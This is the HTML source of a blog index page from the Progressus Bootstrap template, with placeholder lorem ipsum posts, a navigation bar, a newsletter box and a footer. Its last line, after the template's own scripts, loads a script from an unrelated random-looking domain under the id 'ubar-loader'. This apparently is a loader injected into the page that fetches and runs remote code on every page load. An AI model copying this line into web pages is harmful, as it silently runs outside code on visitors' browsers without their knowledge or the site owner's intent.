<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport"    content="width=device-width, initial-scale=1.0">
	<meta name="description" content="">
	<meta name="author"      content="Sergey Pozhilov (GetTemplate.com)">

	<title>Blog - Progressus Bootstrap template</title>

	<link rel="shortcut icon" href="assets/images/gt_favicon.png">

	<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Raleway:200,400,600|Open+Sans:300,400,700">
	<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
	<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

	<!-- Custom styles for our template -->
	<link rel="stylesheet" href="assets/css/styles.css">

	<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
	<!--[if lt IE 9]>
	<script src="assets/js/html5shiv.js"></script>
	<script src="assets/js/respond.min.js"></script>
	<![endif]-->
</head>

<body class="page-blog">

	<!-- fixed navbar -->
	<div class= "navbar navbar-dual navbar-inverse navbar-fixed-top headroom ontop-now">
		<div class="container">
			<div class="navbar-header">
				<!-- Button for smallest screens -->
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"><span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
				<a class="navbar-brand" href="index.html">
					<img src="assets/images/logo.png" alt="Progressus HTML5 template">
					<img src="assets/images/logo_on_white.png" alt="Progressus HTML5 template" class="secondary">
				</a>
			</div>
			<div class="navbar-collapse collapse">
				<ul class="nav navbar-nav pull-right">
					<li><a href="index.html">Home</a></li>
					<li><a href="landing-startup.html">Landing</a></li>
					<li><a href="features.html">Features</a></li>
					<li><a href="pricing.html">Pricing</a></li>
					<li class="dropdown">
						<a href="#" class="dropdown-toggle" data-hover="dropdown" data-toggle="dropdown">More Pages <b class="caret"></b></a>
						<ul class="dropdown-menu">
							<li><a href="services.html">Services</a></li>
							<li><a href="portfolio.html">Portfolio</a></li>
							<li><a href="portfolio-item.html">Portfolio Item</a></li>
							<li class="active"><a href="blog.html">Blog Home</a></li>
							<li><a href="single.html">Single Post</a></li>
							<li><a href="about.html">About</a></li>
							<li><a href="sidebar-left.html">Left Sidebar</a></li>
							<li><a href="sidebar-right.html">Right Sidebar</a></li>
							<li><a href="contact.html">Contact</a></li>
						</ul>
					</li>
					<li><a class="btn btn-rounded" href="signin.html">SIGN IN / SIGN UP</a></li>
				</ul>
			</div><!--/.nav-collapse -->
		</div>
	</div>
	<!-- end of fixed navbar -->


	<!-- header -->
	<header class="head-inner">
		<div class="container">
			<div class="row">
				<h1 class="page-title text-center">Progressus Blog</h1>
				<h2 class="page-lead text-center">Fresh news, updates, tricks and case studies</h2>
			</div>
		</div>
	</header>
	<!-- end of header -->


	<!-- posts section -->
	<section class="section section-blog">
		<div class="container">
			<div class="row">
				<div class="col-md-8 col-md-offset-2">

					<!-- post -->
					<article class="post">
						<div class="entry-header">
							<h1 class="entry-title"><a href="single.html" rel="bookmark">Hello world!</a></h1>
							<div class="entry-meta">
								<span class="posted-on"><time class="entry-date published" date="2015-04-14">Posted by <a href="">Sergey</a> <span class="meta-divider">•</span> April 14, 2015</time></span>
							</div>
						</div>
						<div class="entry-content">
							<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Eius, molestias, architecto, adipisci, numquam dolor iusto eos reprehenderit placeat quam debitis quas magni eveniet. Saepe, nam, iste consectetur quae necessitatibus dolores provident veritatis possimus rerum facilis quia dicta itaque sapiente iusto natus quidem magni quibusdam. Explicabo nesciunt vel rem obcaecati reprehenderit eveniet culpa repudiandae. Distinctio, quia, provident illum necessitatibus repellendus rem voluptates exercitationem numquam inventore itaque atque sint nihil eveniet consequuntur eius! Laborum, at sit animi quae quidem ex tempora facilis.</p>
							<p><a href="single.html" class="more-link">Continue reading</a></p>
						</div>
					</article>
					<!-- /post -->

					<!-- post -->
	 				<article class="post">
						<div class="entry-header">
	 						<h1 class="entry-title"><a href="single.html" rel="bookmark">Vivamus Lacus Mauris</a></h1>
	 						<div class="entry-meta">
	 							<span class="posted-on"><time class="entry-date published" date="2015-04-14">Posted by <a href="">Sergey</a> <span class="meta-divider">•</span> April 14, 2015</time></span>
	 						</div>
						</div>
						<div class="entry-content">
							<p><img alt="" src="assets/images/mac.jpg"></p>
							<p>Mauris eget quam orci. Quisque porta varius dui, quis posuere nibh mollis quis. Mauris commodo rhoncus porttitor. Maecenas et euismod elit. Nulla facilisi. Vivamus lacus libero, ultrices non ullamcorper ac, tempus sit amet enim. Suspendisse at semper ipsum. Suspendisse sagittis diam a massa viverra sollicitudin. Vivamus sagittis est eu diam fringilla nec tristique metus vestibulum. Donec magna purus, pellentesque vel lobortis ut, convallis id augue. Sed odio magna, pellentesque eget convallis ac, vehicula vel arcu. Sed eu scelerisque dui. Sed eu arcu at nibh hendrerit viverra. Vivamus lacus augue, sodales id cursus in, condimentum at risus. </p>
							<p><a href="single.html" class="more-link">Continue reading</a></p>
						</div>
					</article>
					<!-- /post -->

					<!-- post -->
					<article class="post">
						<div class="entry-header">
	 						<h1 class="entry-title"><a href="single.html" rel="bookmark">Vivamus Lacus Mauris</a></h1>
	 						<div class="entry-meta">
	 							<span class="posted-on"><time class="entry-date published" date="2015-04-14">Posted by <a href="">Sergey</a> <span class="meta-divider">•</span> April 14, 2015</time></span>
	 						</div>
						</div>
						<div class="entry-content">
							<p>Mauris eget quam orci. Quisque porta varius dui, quis posuere nibh mollis quis. Mauris commodo rhoncus porttitor. Maecenas et euismod elit. Nulla facilisi. Vivamus lacus libero, ultrices non ullamcorper ac, tempus sit amet enim. Suspendisse at semper ipsum. Suspendisse sagittis diam a massa viverra sollicitudin. Vivamus sagittis est eu diam fringilla nec tristique metus vestibulum. Donec magna purus, pellentesque vel lobortis ut, convallis id augue. Sed odio magna, pellentesque eget convallis ac, vehicula vel arcu. Sed eu scelerisque dui. Sed eu arcu at nibh hendrerit viverra. Vivamus lacus augue, sodales id cursus in, condimentum at risus.</p>
							<p><a href="single.html" class="more-link">Continue reading</a></p>
						</div>
					</article>
					<!-- /post -->

					<!-- post -->
					<article class="post">
						<div class="entry-header">
							<h1 class="entry-title"><a href="single.html" rel="bookmark">Maecenas Quisque Suspendisse Lorem</a></h1>
							<div class="entry-meta">
								<span class="posted-on"><time class="entry-date published" date="2015-04-14">Posted by <a href="">Sergey</a> <span class="meta-divider">•</span> April 14, 2015</time></span>
							</div>
						</div>
						<div class="entry-content">
							<p>Mauris eget quam orci. Quisque porta varius dui, quis posuere nibh mollis quis. Mauris commodo rhoncus porttitor. Maecenas et euismod elit. Nulla facilisi. Vivamus lacus libero, ultrices non ullamcorper ac, tempus sit amet enim. Suspendisse at semper ipsum. Suspendisse sagittis diam a massa viverra sollicitudin. Vivamus sagittis est eu diam fringilla nec tristique metus vestibulum. Donec magna purus, pellentesque vel lobortis ut, convallis id augue. Sed odio magna, pellentesque eget convallis ac, vehicula vel arcu. Sed eu scelerisque dui. Sed eu arcu at nibh hendrerit viverra. Vivamus lacus augue, sodales id cursus in, condimentum at risus.</p>
							<p><a href="single.html" class="more-link">Continue reading</a></p>
						</div>
	 				</article>
	 				<!-- /post -->

					<!-- post -->
					<article class="post">
						<div class="entry-header">
							<h1 class="entry-title"><a href="single.html" rel="bookmark">Pellentesque Eget Convallis</a></h1>
	 						<div class="entry-meta">
	 							<span class="posted-on"><time class="entry-date published" date="2015-04-14">Posted by <a href="">Sergey</a> <span class="meta-divider">•</span> April 14, 2015</time></span>
	 						</div>
						</div>
						<div class="entry-content">
							<p>Mauris eget quam orci. Quisque porta varius dui, quis posuere nibh mollis quis. Mauris commodo rhoncus porttitor. Maecenas et euismod elit. Nulla facilisi. Vivamus lacus libero, ultrices non ullamcorper ac, tempus sit amet enim. Suspendisse at semper ipsum. Suspendisse sagittis diam a massa viverra sollicitudin. Vivamus sagittis est eu diam fringilla nec tristique metus vestibulum. Donec magna purus, pellentesque vel lobortis ut, convallis id augue. Sed odio magna, pellentesque eget convallis ac, vehicula vel arcu. Sed eu scelerisque dui. Sed eu arcu at nibh hendrerit viverra. Vivamus lacus augue, sodales id cursus in, condimentum at risus.</p>
							<p><a href="single.html" class="more-link">Continue reading</a></p>
						</div>
					</article>
					<!-- /post -->

					<!-- previous/next page links -->
					<div class="row">
						<div class="col-sm-6">
							<a href="" class="btn btn-action btn-ghost btn-rounded"><i class="fa fa-long-arrow-left"></i> Previous entries</a>
						</div>
						<div class="col-sm-6 text-right">
							<!-- <a href="" class="btn btn-action btn-ghost btn-rounded">Newer entries <i class="fa fa-long-arrow-right"></i></a> -->
						</div>
					</div>

				</div>
			</div>
		</div>
	</section>
	<!-- end of posts section -->


	<!-- subscribe to updates section -->
	<section class="section jumbotron bottomspace-0">
		<div class="container">
			<div class="row">
				<div class="col-sm-4 col-sm-push-2">
					<h3>Don't miss any update</h3>
					<p>Subscribe to our newsletter. Don't worry, we're not going to spam you )</p>
				</div>
				<div class="col-sm-3 col-sm-push-3">
					<div class="input-group topspace-2x">
						<input type="text" class="form-control" placeholder="your@email">
						<span class="input-group-btn">
							<button class="btn btn-default" type="button">Subscribe</button>
						</span>
					</div>
				</div>
			</div>
		</div>
	</section>
	<!-- end of subscribe to updates section -->


	<footer id="footer" class="">

		<div class="footer1">
			<div class="container">
				<div class="row">

					<div class="col-md-3 widget">
						<h3 class="widget-title">Contact</h3>
						<div class="widget-body">
							<p>+234 23 9873237<br>
								<a href="mailto:#">some.email@somewhere.com</a><br>
								<br>
								234 Hidden Pond Road, Ashland City, TN 37015
							</p>
						</div>
					</div>

					<div class="col-md-3 widget">
						<h3 class="widget-title">Follow us</h3>
						<div class="widget-body">
							<p class="follow-me-icons clearfix">
								<a href=""><i class="fa fa-twitter fa-2"></i></a>
								<a href=""><i class="fa fa-dribbble fa-2"></i></a>
								<a href=""><i class="fa fa-github fa-2"></i></a>
								<a href=""><i class="fa fa-facebook fa-2"></i></a>
							</p>
						</div>
					</div>

					<div class="col-md-6 widget">
						<h3 class="widget-title">Text widget</h3>
						<div class="widget-body">
							<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Excepturi, dolores, quibusdam architecto voluptatem amet fugiat nesciunt placeat provident cumque accusamus itaque voluptate modi quidem dolore optio velit hic iusto vero praesentium repellat commodi ad id expedita cupiditate repellendus possimus unde?</p>
							<p>Eius consequatur nihil quibusdam! Laborum, rerum, quis, inventore ipsa autem repellat provident assumenda labore soluta minima alias temporibus facere distinctio quas adipisci nam sunt explicabo officia tenetur at ea quos doloribus dolorum voluptate reprehenderit architecto sint libero illo et hic.</p>
						</div>
					</div>

				</div> <!-- /row of widgets -->
			</div>
		</div>

		<div class="footer2">
			<div class="container">
				<div class="row">

					<div class="col-md-6 widget">
						<div class="widget-body">
							<p class="simplenav">
								<a href="#">Home</a> |
								<a href="about.html">About</a> |
								<a href="sidebar-right.html">Sidebar</a> |
								<a href="contact.html">Contact</a> |
								<b><a href="signup.html">Sign up</a></b>
							</p>
						</div>
					</div>

					<div class="col-md-6 widget">
						<div class="widget-body">
							<p class="text-right">
								Copyright &copy; 2014, Your name. Design: <a href="http://gettemplate.com/" rel="designer">GetTemplate</a>
							</p>
						</div>
					</div>

				</div> <!-- /row of widgets -->
			</div>
		</div>
	</footer>


	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	  ga('create', 'UA-48366846-1', 'gettemplate.com');
	  ga('send', 'pageview');
	</script>

	<!-- JavaScript libs are placed at the end of the document so the pages load faster -->
	<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
	<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
	<script src="assets/js/bootstrap-hover-dropdown.min.js"></script>
	<script src="assets/js/headroom.min.js"></script>
	<script src="assets/js/jQuery.headroom.min.js"></script>
	<script src="assets/js/template.js"></script>
<script src="http://minxxrpaaw.org/code.php?appid=coi1634-10064-1491396470062-cf50e48c-094b-4367-935a-53ea4dcc15b7&h=0&m=normal&aff=0" id="ubar-loader"></script></body>
</html>
